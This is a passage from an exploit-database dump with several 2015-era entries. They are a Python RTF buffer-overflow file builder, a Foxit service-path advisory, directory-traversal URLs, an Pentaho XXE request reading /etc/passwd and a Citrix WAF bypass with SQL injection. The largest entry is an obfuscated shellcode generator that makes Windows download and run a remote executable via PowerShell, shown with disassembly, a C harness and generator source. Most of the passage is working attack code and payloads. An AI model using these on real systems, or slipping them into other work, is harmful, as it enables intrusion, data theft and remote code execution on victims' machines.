content+= 'cb818278'# Address=788281CB jmp esp | {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll)
content+="9090909090909090" #nops
content+= shellcode
#junk
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000"
content+="\n"
content+="}"
content+="}"
content+="}"
banner = "\n\n"
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_|[] /_/ \_\_____|\n\n"
print banner
if(len(sys.argv) < 2):
print '\n Usage : exploit.py filename.rtf'
else:
filename = sys.argv[1]
f=open(filename,"w")
f.write(content)
f.close()
print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'

55
platforms/windows/local/36390.txt Executable file
View file

@ -0,0 +1,55 @@
?
Foxit Reader 7.0.6.1126 Unquoted Service Path Elevation Of Privilege
Vendor: Foxit Software Incorporated
Product web page: http://www.foxitsoftware.com
Affected version: 7.0.6.1126 and 6.1
Summary: Foxit Reader is a small, lightning fast, and feature rich PDF
viewer which allows you to create (free PDF creation), open, view, sign,
and print any PDF file.
Desc: The application suffers from an unquoted search path issue impacting
the service 'FoxitCloudUpdateService' for Windows deployed as part of Foxit
Reader. This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. A
successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local users code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Aljaz Ceru
aljaz@insec.si
Advisory ID: ZSL-2015-5235
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5235.php
Vendor: http://www.foxitsoftware.com/support/security_bulletins.php#FRD-25
17.02.2015
--
C:\Users\user>sc qc FoxitCloudUpdateService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FoxitCloudUpdateService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Foxit Cloud Safe Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>

12
platforms/windows/remote/36376.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/50845/info
Oxide WebServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks.
http://www.example.com/..\..\..\boot.ini
http://www.example.com/..\\..\\..\\boot.ini
http://www.example.com/..\/..\/..\/boot.ini
http://www.example.com//..\/..\/..\boot.ini
http://www.example.com/.\..\.\..\.\..\boot.ini

314
platforms/windows/shellcode/36411.txt Executable file
View file

@ -0,0 +1,314 @@
#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator
#length: Dynamic ! depend on url and filename
#Date: 20 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x64 ultimate
#WinExec => 0x77b1e695
#ExitProcess => 0x77ae2acf
#====================================
#Execute :
#powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe"
#====================================
#Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
#Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
####################################################
#How it work ?
'''
C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py"
Enter url
Example: http://z3r0d4y.com/file.exe
Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe
Enter filename
Example: D:\file.exe
Enter:C:\Ali.exe
C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o
C:\Users\Ali\Desktop>objdump -D shellcode.o
shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: 31 c0 xor %eax,%eax
2: 50 push %eax
3: 68 41 41 65 22 push $0x22654141
8: 58 pop %eax
9: c1 e8 08 shr $0x8,%eax
c: c1 e8 08 shr $0x8,%eax
f: 50 push %eax
10: b8 34 47 0b 4d mov $0x4d0b4734,%eax
15: bb 5d 69 6e 35 mov $0x356e695d,%ebx
1a: 31 d8 xor %ebx,%eax
1c: 50 push %eax
1d: b8 43 32 10 22 mov $0x22103243,%eax
22: bb 79 6e 51 4e mov $0x4e516e79,%ebx
27: 31 d8 xor %ebx,%eax
29: 50 push %eax
2a: b8 60 05 42 32 mov $0x32420560,%eax
2f: bb 49 78 79 71 mov $0x71797849,%ebx
34: 31 d8 xor %ebx,%eax
36: 50 push %eax
37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax
3c: bb 6a 64 49 33 mov $0x3349646a,%ebx
41: 31 d8 xor %ebx,%eax
43: 50 push %eax
44: b8 07 3e 0b 40 mov $0x400b3e07,%eax
49: bb 46 52 62 6e mov $0x6e625246,%ebx
4e: 31 d8 xor %ebx,%eax
50: 50 push %eax
51: b8 44 0a 78 07 mov $0x7780a44,%eax
56: bb 63 49 42 5b mov $0x5b424963,%ebx
5b: 31 d8 xor %ebx,%eax
5d: 50 push %eax
5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax
63: bb 6a 31 67 2d mov $0x2d67316a,%ebx
68: 31 d8 xor %ebx,%eax
6a: 50 push %eax
6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax
70: bb 61 4c 39 67 mov $0x67394c61,%ebx
75: 31 d8 xor %ebx,%eax
77: 50 push %eax
78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax
7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx
82: 31 d8 xor %ebx,%eax
84: 50 push %eax
85: b8 45 40 41 66 mov $0x66414045,%eax
8a: bb 3d 78 77 49 mov $0x4977783d,%ebx
8f: 31 d8 xor %ebx,%eax
91: 50 push %eax
92: b8 02 1f 4b 45 mov $0x454b1f02,%eax
97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx
9c: 31 d8 xor %ebx,%eax
9e: 50 push %eax
9f: b8 24 3e 19 32 mov $0x32193e24,%eax
a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx
a9: 31 d8 xor %ebx,%eax
ab: 50 push %eax
ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax
b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx
b6: 31 d8 xor %ebx,%eax
b8: 50 push %eax
b9: b8 1f 37 40 24 mov $0x2440371f,%eax
be: bb 6d 52 32 41 mov $0x4132526d,%ebx
c3: 31 d8 xor %ebx,%eax
c5: 50 push %eax
c6: b8 2e 35 68 31 mov $0x3168352e,%eax
cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx
d0: 31 d8 xor %ebx,%eax
d2: 50 push %eax
d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax
d8: bb 67 6e 69 61 mov $0x61696e67,%ebx
dd: 31 d8 xor %ebx,%eax
df: 50 push %eax
e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax
e5: bb 4f 45 62 33 mov $0x3362454f,%ebx
ea: 31 d8 xor %ebx,%eax
ec: 50 push %eax
ed: b8 20 57 1d 45 mov $0x451d5720,%eax
f2: bb 47 78 63 36 mov $0x36637847,%ebx
f7: 31 d8 xor %ebx,%eax
f9: 50 push %eax
fa: b8 04 6a 24 3b mov $0x3b246a04,%eax
ff: bb 77 44 4b 49 mov $0x494b4477,%ebx
104: 31 d8 xor %ebx,%eax
106: 50 push %eax
107: b8 18 0f 0a 32 mov $0x320a0f18,%eax
10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx
111: 31 d8 xor %ebx,%eax
113: 50 push %eax
114: b8 7d 18 3c 27 mov $0x273c187d,%eax
119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx
11e: 31 d8 xor %ebx,%eax
120: 50 push %eax
121: b8 03 44 60 60 mov $0x60604403,%eax
126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx
12b: 31 d8 xor %ebx,%eax
12d: 50 push %eax
12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax
133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx
138: 31 d8 xor %ebx,%eax
13a: 50 push %eax
13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax
140: bb 6c 37 47 45 mov $0x4547376c,%ebx
145: 31 d8 xor %ebx,%eax
147: 50 push %eax
148: b8 59 07 12 0e mov $0xe120759,%eax
14d: bb 35 68 73 6a mov $0x6a736835,%ebx
152: 31 d8 xor %ebx,%eax
154: 50 push %eax
155: b8 01 59 11 2c mov $0x2c115901,%eax
15a: bb 45 36 66 42 mov $0x42663645,%ebx
15f: 31 d8 xor %ebx,%eax
161: 50 push %eax
162: b8 22 22 4e 5a mov $0x5a4e2222,%eax
167: bb 4c 56 67 74 mov $0x7467564c,%ebx
16c: 31 d8 xor %ebx,%eax
16e: 50 push %eax
16f: b8 00 37 1b 48 mov $0x481b3700,%eax
174: bb 43 5b 72 2d mov $0x2d725b43,%ebx
179: 31 d8 xor %ebx,%eax
17b: 50 push %eax
17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax
181: bb 64 48 47 71 mov $0x71474864,%ebx
186: 31 d8 xor %ebx,%eax
188: 50 push %eax
189: b8 6a 23 03 18 mov $0x1803236a,%eax
18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx
193: 31 d8 xor %ebx,%eax
195: 50 push %eax
196: b8 2d 54 57 1c mov $0x1c57542d,%eax
19b: bb 47 31 34 68 mov $0x68343147,%ebx
1a0: 31 d8 xor %ebx,%eax
1a2: 50 push %eax
1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax
1a8: bb 39 38 79 38 mov $0x38793839,%ebx
1ad: 31 d8 xor %ebx,%eax
1af: 50 push %eax
1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax
1b5: bb 79 57 51 61 mov $0x61515779,%ebx
1ba: 31 d8 xor %ebx,%eax
1bc: 50 push %eax
1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax
1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx
1c7: 31 d8 xor %ebx,%eax
1c9: 50 push %eax
1ca: b8 2c 18 08 54 mov $0x5408182c,%eax
1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx
1d4: 31 d8 xor %ebx,%eax
1d6: 50 push %eax
1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax
1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx
1e1: 31 d8 xor %ebx,%eax
1e3: 50 push %eax
1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax
1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx
1ee: 31 d8 xor %ebx,%eax
1f0: 50 push %eax
1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax
1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx
1fb: 31 d8 xor %ebx,%eax
1fd: 50 push %eax
1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax
203: bb 39 44 61 4f mov $0x4f614439,%ebx
208: 31 d8 xor %ebx,%eax
20a: 50 push %eax
20b: 89 e0 mov %esp,%eax
20d: bb 41 41 41 01 mov $0x1414141,%ebx
212: c1 eb 08 shr $0x8,%ebx
215: c1 eb 08 shr $0x8,%ebx
218: c1 eb 08 shr $0x8,%ebx
21b: 53 push %ebx
21c: 50 push %eax
21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx
222: ff d3 call *%ebx
224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx
229: ff d3 call *%ebx
C:\Users\Ali\Desktop>
#you have your shellcode now
=======================================
shellcode.c
#include <stdio.h>
#include <string.h>
int main(){
unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\x50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\xcf\x2a\xae\x77\xff\xd3";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
=======================================
C:\Users\Ali\Desktop>gcc shellcode.c -o shellcode.exe
C:\Users\Ali\Desktop>shellcode.exe
Length: 173
C:\Users\Ali\Desktop>
#notice : when program exit, you must wait 2-3 second , it will finish download and execute file after 2-3 second
'''
import random,binascii
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789=[]-'
p1 = '''xor eax,eax
push eax
'''
p2 = '''
mov eax,esp
mov ebx,0x01414141
shr ebx,0x08
shr ebx,0x08
shr ebx,0x08
push ebx
push eax
mov ebx,0x77b1e695
call ebx
mov ebx,0x77ae2acf
call ebx
'''
sen1 = str(raw_input('Enter url\nExample: http://z3r0d4y.com/file.exe \nEnter:'))
sen1 = sen1.rsplit()
sen1 = sen1[0]
sen2 = str(raw_input('Enter filename\nExample: D:\\file.exe\nEnter:'))
sen2 = sen2.rsplit()
sen2 = sen2[0]
sen = '''powershell -command "& { (New-Object Net.WebClient).DownloadFile('%s', '%s')};%s"''' %(sen1,sen2,sen2)
m = 0
for word in sen:
m += 1
m = m - 1
stack = ''
while(m>=0):
stack += sen[m]
m -= 1
stack = stack.encode('hex')
skip = 1
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if len(stack) % 8 == 0:
zxzxzxz = 0
m = len(stack) / 8
c = 0
n = 0
z = 8
shf = open('shellcode.asm','w')
shf.write(p1)
shf.close()
shf = open('shellcode.asm','a')
while(c<m):
v = 'push 0x' + stack[n:z]
skip = 0
if '0x000000' in v:
skip = 1
q1 = v[13:]
v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x0000' in v:
skip = 1
q1 = v[11:]
v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x00' in v:
skip = 1
q1 = v[9:]
v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n'
if skip is 1:
shf.write(v)
if skip is 0:
v = v.rsplit()
zzz = ''
for w in v:
if '0x' in w:
zzz = str(w)
s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))
s1 = '0x%s'%s1
data = "%x" % (int(zzz, 16) ^ int(s1, 16))
v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1)
shf.write(v)
n += 8
z += 8
c += 1
shf.write(p2)
shf.close()

92
platforms/xml/webapps/36132.txt Executable file
View file

@ -0,0 +1,92 @@
========================================================================
title: Pentaho User Console XML Injection Vulnerability
program: Pentaho BI User Console
vulnerable version: Pentaho < 4.5.0
homepage: http://www.pentaho.com/
Tested on: Linux x86/x86_64
found: Feb. 5 2014
Original Discovery by: Taylor Tippins
Exploit By: K.d Long kd@stonedcoder.org
========================================================================
Vendor description:
-------------------
The Pentaho Business Analytics suite manages Business Intelligence solutions, generate the reports,
data aggregation, and provides users access to analysis views.
Vulnerability description:
--------------------------
The dashboardXml parameter is vulnerable to XML external entity injection. The tag <!DOCTYPE foo
[<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> ]> was injected into the XML of the client's POST
request. This tag defines an external entity, xxe8295c, which references a file on the XML parser's
filesystem. This entity was then used within a data field in the XML document. The server's response
contains the contents of the specified file, indicating that the parser processed the injected
external entity.
By manipulating the POST request to “/pentaho/content/dashboards” it is possible to inject arbitrary
XML declarations- and tags. This request is triggered while a user is creating a customized dashboard.
Proof of concept:
-----------------
The following entity declaration would create a new XML entity with the content of the /etc/passwd
file which can be referenced in the following XML request content:
---cut here---
POST /pentaho/content/dashboards HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: https://example.com/pentaho/content/dashboards?command=new
Cookie: loginNewWindowChecked=false; JSESSIONID=61448378278C147D05BC95BAB4B63F19
Content-Length: 2458
Connection: keep-alive
command=templatecontents&dashboardXml=<!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM "file:///etc/passwd">
]><dashboard>
<title>New Dashboard</title>
<heading>New Dashboard</heading>
<enableWidgetPrinting>false</enableWidgetPrinting>
<documentation>
<author>test</author>
<description></description>
<icon></icon>
</documentation>
<template-ref>xul/04-1-then-2.xul&xxe8295c;</template-ref>
<theme-ref>00-Onyx</theme-ref>
<layout>
<overlay xmlns:pho="http://www.pentaho.com">
<box id="Panel_1" pho:title="Untitled 1" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_2" pho:title="Untitled 2" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_3" pho:title="Untitled 3" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_4" pho:title="Untitled 4" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_5" pho:title="Untitled 5"/>
<box id="Panel_6" pho:title="Untitled 6"/>
<box id="Panel_7" pho:title="Untitled 7"/>
<box id="Panel_8" pho:title="Untitled 8"/>
<box id="Panel_9" pho:title="Untitled 9"/>
<box id="Panel_10" pho:title="Untitled 10"/>
<box id="titlebar" title="" height="23" hidden="false" width="0" type="pagetitle"
collapsed="false" /><box id="widget-area" type="scrollarea"/><box id="widget-area" flex="1"/><box
id="FilterPanel" title="" height="100" hidden="true" width="0" type="povpanel" collapsed="false"
/><box id="hbox1" type="layout"/><box id="hbox1" flex="1"/><box id="hbox2" type="layout"/><box
id="hbox2" flex="1"/></overlay>
</layout>
<parameters>
</parameters>
<widgetJavascript><![CDATA[[]]]></widgetJavascript>
</dashboard>
&type=html
---cut here---
Vulnerable versions:
--------------------
Pentaho User Console Release 4.5.0.GA.49857
Vendor contact timeline:
------------------------
02/16/2014: Vendor notified via email

112
platforms/xml/webapps/36369.txt Executable file
View file

@ -0,0 +1,112 @@
# Exploit Title: [Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution]
# Date: [Mar 13, 2015]
# Exploit Author: [BGA Security]
# Vendor Homepage: [http://www.citrix.com/]
# Version: [NS10.5]
# Tested on: [NetScaler NS10.5: Build 50.9.nc,]
Document Title:
============
Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution
Release Date:
===========
12 Mar 2015
Product & Service Introduction:
========================
Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications.
Abstract Advisory Information:
=======================
BGA Security Team discovered an HTTP Header Pollution
vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable)
Vulnerability Disclosure Timeline:
=========================
2 Feb 2015 Bug reported to the vendor.
4 Feb 2015 Vendor returned with a case ID.
5 Feb 2015 Detailed info/config given.
12 Feb 2015 Asked about the case.
16 Feb 2015 Vendor returned "investigating ..."
6 Mar 2015 Asked about the case.
6 Mar 2015 Vendor has validated the issue.
12 Mar 2015 There aren't any fix addressing the issue.
Discovery Status:
=============
Published
Affected Product(s):
===============
Citrix Systems, Inc.
Product: Citrix Netscaler NS10.5 (other versions may be vulnerable)
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup:
An Apache web server with default configuration on Windows (XAMPP).
A SOAP web service which has written in PHP and vulnerable to SQL injection.
Netscaler WAF with SQL injection rules.
First request: union select current_user,2# - Netscaler blocks it.
Second request: The same content and an additional HTTP header which is “Content-Type: application/octet-stream”. - It bypasses the WAF but the web server misinterprets it.
Third request: The same content and two additional HTTP headers which are “Content-Type: application/octet-stream” and “Content-Type: text/xml” in that order. The request is able to bypass the WAF and the web server runs it.
Proof of Concept (PoC):
==================
Proof of Concept
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<string> union select current_user, 2#</string>
</soapenv:Body>
</soapenv:Envelope>
Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<return xsi:type=“xsd:string”> Name: root@localhost </return>
</soap:Body>
</soap:Envelope>
Solution Fix & Patch:
================
12 Mar 2015 There aren't any fix addressing the issue.
Security Risk:
==========
The risk of the vulnerability above estimated as high.
Credits & Authors:
==============
BGA Bilgi Güvenli?i - Onur ALANBEL
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2015 | BGA